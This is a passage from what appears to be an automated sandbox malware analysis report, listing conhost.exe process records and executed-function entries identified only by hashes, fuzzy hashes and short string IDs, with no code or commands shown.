                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FFD9B880A31 Relevance: .4, Instructions: 428COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16e2f8d2a9a8d4d74b9a110e8326f6dd3c021d50a57ae7d3201b58eaa29bccfa
                                                                        • Instruction ID: 39dfcdf312036720f6eab799e7d345ca928adb2dcaeffa267a1bdfd4d7c785e0
                                                                        • Opcode Fuzzy Hash: 16e2f8d2a9a8d4d74b9a110e8326f6dd3c021d50a57ae7d3201b58eaa29bccfa
                                                                        • Instruction Fuzzy Hash: 5FD16130B2991D4FDBA9EB68D464ABE73E2FF58711B110639E42AC32E5CE34A9418740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B88031D Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DS^I$3CO_^
                                                                        • API String ID: 0-558954139
                                                                        • Opcode ID: a8cb1c4f61e0f77a1f45d24c35d2c42ffa6b5d4979f2ab6cc24f9abe7c9d2180
                                                                        • Instruction ID: 0b5bcffbd95d0ee84e44a66b4d2b1721a111d2687aede45c11794785f3a6d951
                                                                        • Opcode Fuzzy Hash: a8cb1c4f61e0f77a1f45d24c35d2c42ffa6b5d4979f2ab6cc24f9abe7c9d2180
                                                                        • Instruction Fuzzy Hash: 5A411953A0FED60FF67357AC2C310A92F94AF5561875A40FBD0E84B0EBA954AD0683C5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B880888 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3CO_^
                                                                        • API String ID: 0-3937211734
                                                                        • Opcode ID: a3a5ab9c1d28fbd5292e80512ad0d8089bdc51bfd47631454a9374f251ac9da1
                                                                        • Instruction ID: 9f9d7083c22132c9717ef703c44f1e19d899247b1e20fc25f0573b367fe5208d
                                                                        • Opcode Fuzzy Hash: a3a5ab9c1d28fbd5292e80512ad0d8089bdc51bfd47631454a9374f251ac9da1
                                                                        • Instruction Fuzzy Hash: B7F0BE20E5E58A07FB7933B418363F82A419F89718F5A04BCD46D4B2E3DE3E69818291
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8804A0 Relevance: .5, Instructions: 499COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9182f6ed13d2c267b7cbfb6a4c74792ff510aa3eb99e3a7772f3d5ec79a8ff58
                                                                        • Instruction ID: 5df0ee9089d278d46458b8f07677b4a7aee33c56fce0ea31895eee71c818b466
                                                                        • Opcode Fuzzy Hash: 9182f6ed13d2c267b7cbfb6a4c74792ff510aa3eb99e3a7772f3d5ec79a8ff58
                                                                        • Instruction Fuzzy Hash: 77412842F1EEC66FF32553B948391A57F90FF66B14B0E41BBC0B8460D3DD28A9058292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8804A8 Relevance: .3, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72eeae83a9985ebdfb9c2a8dc4e421e645bdee29aa015f942e5b883b8e642f7d
                                                                        • Instruction ID: ecfe039a108e55dd775ceefc049fd54a8a50da1790d566e8f29a078b7472bbe5
                                                                        • Opcode Fuzzy Hash: 72eeae83a9985ebdfb9c2a8dc4e421e645bdee29aa015f942e5b883b8e642f7d
                                                                        • Instruction Fuzzy Hash: 1271D861B19E4D4FE7A8EB6C58697B867D2EFAC310F05017BE45DC32D6DE38A8414381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B881079 Relevance: .1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 081e2cbb33934ae7ccdcc7110c8ff15fe46585ebff16eeec2098990e47343178
                                                                        • Instruction ID: 7c4cec0cda3374c4e8964b712d34ac1fbab49fe0676268be7c053de874ebc23e
                                                                        • Opcode Fuzzy Hash: 081e2cbb33934ae7ccdcc7110c8ff15fe46585ebff16eeec2098990e47343178
                                                                        • Instruction Fuzzy Hash: 6001C412F0ED890FE7A4A7BC6C66AB467C1DF9D221B4901BAE05CC32EBDC286C424341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8809C5 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac0e4da4415fca69c920d965ff6daf9790d77c631f757581da6f46e601cf1256
                                                                        • Instruction ID: b6bbf0a9af40a82a78f29924780865c71670f6a47af1ea32aeee0f351739f10a
                                                                        • Opcode Fuzzy Hash: ac0e4da4415fca69c920d965ff6daf9790d77c631f757581da6f46e601cf1256
                                                                        • Instruction Fuzzy Hash: 0E113F31B18A194FEB98EB2898618BE7BE1FF88310B410575D41CC32DADE34A941C381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8804B0 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db7ab0b5e82b664264783a9e9524098895e9c5d717ef43bc63454dd22f314e7b
                                                                        • Instruction ID: 6ffd8cbf6958f5f87489e7694c9ad53478a3eb97f8b62a2f29d0385a7e645c09
                                                                        • Opcode Fuzzy Hash: db7ab0b5e82b664264783a9e9524098895e9c5d717ef43bc63454dd22f314e7b
                                                                        • Instruction Fuzzy Hash: 63018622F1ED4D0BF7B4B6FD2C6A6B962C5DB9C221B550176E42DC32EADC285C824381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        Function 00007FFD9B8B3EF9 Relevance: 1.6, Strings: 1, Instructions: 360COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$(
                                                                        • API String ID: 0-1942707054
                                                                        • Opcode ID: c3c6a4c6007e18a5cf58c09ada29b806cba721daaa3befe5f42021a1af9ac65c
                                                                        • Instruction ID: 179d6f9e66b105f659332372ecbf7f62a1c60f1b498f8a1ca6eb3e13a051c3ca
                                                                        • Opcode Fuzzy Hash: c3c6a4c6007e18a5cf58c09ada29b806cba721daaa3befe5f42021a1af9ac65c
                                                                        • Instruction Fuzzy Hash: F9C13931E0D69E4FEBA4DB7488626B97BE1FF49310F09017ED05DC72E2DA285906CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B2731 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: yR_H
                                                                        • API String ID: 0-493830893
                                                                        • Opcode ID: 792725120b244c5503b8ae6b171340eddee5b8579c1a7d1d1679a203efbf7929
                                                                        • Instruction ID: 57e3bbe094b5f2f1fc32b4dbe9a9de6e798b6099a3595285c633b5e0dbd68096
                                                                        • Opcode Fuzzy Hash: 792725120b244c5503b8ae6b171340eddee5b8579c1a7d1d1679a203efbf7929
                                                                        • Instruction Fuzzy Hash: DFA11971F1DA5D0FDB64EB6C9855ABDB7E1EF9D310F0102BAE04DC3292DE24A9424B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0E30 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: yR_H
                                                                        • API String ID: 0-493830893
                                                                        • Opcode ID: 0a0d67d8297dcc23ee8cc13ea65b220b3ef8b185a7430897f38fc27efe23eeee
                                                                        • Instruction ID: dba8a0f80f33c9846cf8d98f90b4a17b92dc44d2f6620d1a3153d0a616a58bce
                                                                        • Opcode Fuzzy Hash: 0a0d67d8297dcc23ee8cc13ea65b220b3ef8b185a7430897f38fc27efe23eeee
                                                                        • Instruction Fuzzy Hash: 8EA1F931F1DA5D0FDB64EB6C9855ABDB7E1EF9D310F0002BAE44DC3296DE2469424B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B10A5 Relevance: .3, Instructions: 299COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e3d617b0fe1fc1be8d1d644ae30ad08f2b314bfc0f7dff7cefc9cf4a807b54e
                                                                        • Instruction ID: 95aa91a450f2dba659546079371d7e7a568ef15910ac83ac06c8fd9ee8a1a5ee
                                                                        • Opcode Fuzzy Hash: 7e3d617b0fe1fc1be8d1d644ae30ad08f2b314bfc0f7dff7cefc9cf4a807b54e
                                                                        • Instruction Fuzzy Hash: 23A10D31B1E69A4FEB65EFB888712B97791FF4A300F0501BAD4598B1E7DD28B9018781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0E40 Relevance: .3, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9dba7997e712b91e1dd9d8eb086fff0c47c418efd92fd527c7a74bc9c7f64d2
                                                                        • Instruction ID: d0729dc00a5271bd015d03f31e80f2cc1a9270ed347dc4e354dcd8243d753366
                                                                        • Opcode Fuzzy Hash: f9dba7997e712b91e1dd9d8eb086fff0c47c418efd92fd527c7a74bc9c7f64d2
                                                                        • Instruction Fuzzy Hash: D1811931B0CE5D4FD768DFAC9865AB9B7E1EF98310F05427ED04DD32A5DE24A8428B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B53D5 Relevance: .2, Instructions: 246COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f29619f15a30da237b24d5c7267ac56093af3df0c96f84c8c4c38fbfce86d7af
                                                                        • Instruction ID: 41351795d9d8b4c33e4029313c8e41b9c35a65c4f9c7803d6ebb3cfc478ea2bf
                                                                        • Opcode Fuzzy Hash: f29619f15a30da237b24d5c7267ac56093af3df0c96f84c8c4c38fbfce86d7af
                                                                        • Instruction Fuzzy Hash: 3251CE31A0CB5C4FDB59DF5888566EDBBF1FB59310F0082ABD449D7296CA34A845CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0E70 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0f9fad6ddcc60edbf880ff326674bae0e4858884beb53a4a4a1053f26ea9fca
                                                                        • Instruction ID: 0ac29427f6aba45aa12039b56e916b06ceaacf76b3cc150bd1360cbfd8ccd085
                                                                        • Opcode Fuzzy Hash: d0f9fad6ddcc60edbf880ff326674bae0e4858884beb53a4a4a1053f26ea9fca
                                                                        • Instruction Fuzzy Hash: 8B51E571F19A5D4BEF58DBA888656AD77F2FF9C300F05017AD04DE72A2CA3469018B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B13ED Relevance: .2, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f914bb7fbda94a5b6475add6b52d4fdc7ec0adb81a98722ac84a0cfc6804b2b
                                                                        • Instruction ID: 40bf1b456324e18999443b698003e90bfcd41efc54f365651d48f9d66e725744
                                                                        • Opcode Fuzzy Hash: 9f914bb7fbda94a5b6475add6b52d4fdc7ec0adb81a98722ac84a0cfc6804b2b
                                                                        • Instruction Fuzzy Hash: C7712F70E1565D9FEB94EFB4C8656ECBBB1EF49300F4004B9D059AB2A2CE792985CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0A38 Relevance: .2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc279a863d2ec92cb646586ef24e3ca9fc52aae6a2d35d622a71fabb6ceea971
                                                                        • Instruction ID: 5307658a5e46f7aa266036ca5c16dc7ed6d7f78f5c689f4122cd0af0aecbbf66
                                                                        • Opcode Fuzzy Hash: dc279a863d2ec92cb646586ef24e3ca9fc52aae6a2d35d622a71fabb6ceea971
                                                                        • Instruction Fuzzy Hash: 8C517070A14A5E8FDB94DF68C854AEA73F2FF58304F504A69E429C72E5CB34E951CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B1B55 Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0583d113638f9d6fe698975ceddcb15899f954faf24f00d044611a67fb04178
                                                                        • Instruction ID: e74471b5b9f842743a79d84eac11073a7de27f498bcb7b5868c9a0783bfbd3c5
                                                                        • Opcode Fuzzy Hash: b0583d113638f9d6fe698975ceddcb15899f954faf24f00d044611a67fb04178
                                                                        • Instruction Fuzzy Hash: ED517370619A8E4FDF98DF2888B0A6537A1FF5D304B1506ADE46DCB2D2DB35E912CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B2A7A Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b70605e747510c58726501c7ebd05d390aa8ef6c6f2e8153ca1e728af59fd1a7
                                                                        • Instruction ID: a26ade007213a041f111a9aa6d93532a28e32f6ac64d431fc3934b6e920ddf48
                                                                        • Opcode Fuzzy Hash: b70605e747510c58726501c7ebd05d390aa8ef6c6f2e8153ca1e728af59fd1a7
                                                                        • Instruction Fuzzy Hash: 9C314E3165E6CE4FD7269BB868254A57FE0EF46320B0501BBD489CB063DE189902C7C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B1642 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0a8f79560d8021cd23298e2d03ab4d259afc68d919218b46ebb2999fdc909a3
                                                                        • Instruction ID: 98565ff91df19288a979455b119148eb456047d4610eac09bad981d83c5335f5
                                                                        • Opcode Fuzzy Hash: c0a8f79560d8021cd23298e2d03ab4d259afc68d919218b46ebb2999fdc909a3
                                                                        • Instruction Fuzzy Hash: 56212521B28A5D0FD7A4EB7C546A67577D2EB8D610B0501FAE40CC32A3DC18AC0287C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B6D42 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 64aec3a956e4b6b1c89fd22ee945d3466624286c78470f52c6da885e508eb832
                                                                        • Instruction ID: c4110e1f7588c30c06d9f743275433b2e26a24a6300b1ce6d0795d0c29211a15
                                                                        • Opcode Fuzzy Hash: 64aec3a956e4b6b1c89fd22ee945d3466624286c78470f52c6da885e508eb832
                                                                        • Instruction Fuzzy Hash: 8531C020A0959E4FD755EBB8C475ABDBBE1EF09300F0904B8D05AC72F3CE286941CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B07B8 Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0a4e2db963f94a0fc42f42ddf041fef043ce3e70f66ba1f88c382d0a67a973a
                                                                        • Instruction ID: 2ee76f9e975ff3d4c11a64dda6f1f02b691faf21f8d3b7ffaf86bbc689ccd573
                                                                        • Opcode Fuzzy Hash: a0a4e2db963f94a0fc42f42ddf041fef043ce3e70f66ba1f88c382d0a67a973a
                                                                        • Instruction Fuzzy Hash: C0112921F28D2D0FE6A4FB7C546B67973C2EB8C650F0506BAE40DC32A6EC14AC4147C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B3F65 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdf0d101237134975a5485c63c83b096954c1e0630dc94145d75dfb698be8c3e
                                                                        • Instruction ID: 5498c31dbac1261276a45811ec6d1031437804b9beb0f273ffa2ef4b9b7a17c9
                                                                        • Opcode Fuzzy Hash: cdf0d101237134975a5485c63c83b096954c1e0630dc94145d75dfb698be8c3e
                                                                        • Instruction Fuzzy Hash: 5E21A426F0A96E4AFFF497B458322B976A1EF4D310F4A017AD41DC35E3DD186A1B0AC1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B2E19 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2ff4713d106e512de3539616922cf255de6350b78cd126fbf5e8190240caace
                                                                        • Instruction ID: e8ce8b7649652b7cf9f19068ba2ce5792cd5804abdd934b4dc1b8a706a3c5606
                                                                        • Opcode Fuzzy Hash: f2ff4713d106e512de3539616922cf255de6350b78cd126fbf5e8190240caace
                                                                        • Instruction Fuzzy Hash: 9E21E71090E7D92FE32AA7780C6A9A57FE5DF17110F0902FEE495C71E3DC5978068392
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B3E4D Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 60ebbb49c9ad4ee6ccaa024bf45debeb54c9a373f825b1b1336c1d06e8e176f5
                                                                        • Instruction ID: 0aec0e78a591d9f99ab02153b80e43fb6b1c33262ef8185090b51a7c5de5db79
                                                                        • Opcode Fuzzy Hash: 60ebbb49c9ad4ee6ccaa024bf45debeb54c9a373f825b1b1336c1d06e8e176f5
                                                                        • Instruction Fuzzy Hash: 21219050A4F7D61FE36297B818BA5A53FE4CF17110B0A04EFD895CB0E3D90D684B8352
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B6C27 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0170826a6abfca5fdb19401625a3985651ecf306c929e7e89d314ba50c0d732
                                                                        • Instruction ID: 33f6ff57fa17efb953d2f319157e0914d47297c0ba4c35213be8c94d4f80c12b
                                                                        • Opcode Fuzzy Hash: c0170826a6abfca5fdb19401625a3985651ecf306c929e7e89d314ba50c0d732
                                                                        • Instruction Fuzzy Hash: AA11C882B1F96E1FFAB057FC28752A06B91DF0D940B0D00B5D899C71E3DA0DB90A46D2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B6C19 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
